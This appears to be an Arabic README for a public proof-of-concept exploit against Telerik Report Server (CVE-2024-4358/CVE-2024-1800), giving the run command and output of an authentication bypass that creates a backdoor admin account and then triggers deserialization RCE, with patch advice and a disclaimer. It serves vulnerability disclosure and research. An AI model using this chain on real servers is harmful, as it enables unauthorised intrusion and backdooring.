
استغلال تنفيذ الأوامر عن بُعد قبل التحقق من الهوية لخادم تقارير Telerik (CVE-2024-4358/CVE-2024-1800) مع تجاوز المصادقة وتوليد حمولة إلغاء التسلسل.
سلسلة استغلال لثغرات إلغاء التسلسل وتجاوز المصادقة في Telerik Report Server لـ CVE-2024-4358/CVE-2024-1800
يمكن العثور على تحليل جذري للثغرة على مدونتي
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"
(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished
قم بالتحديث إلى أحدث إصدار أو خفف المخاطر باتباع التعليمات الواردة في نشرة Progress Advisory
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا في الحالات المصرح بها صراحةً. القائمون على المشروع غير مسؤولين عن سوء استخدام البرنامج. استخدم بمسؤولية.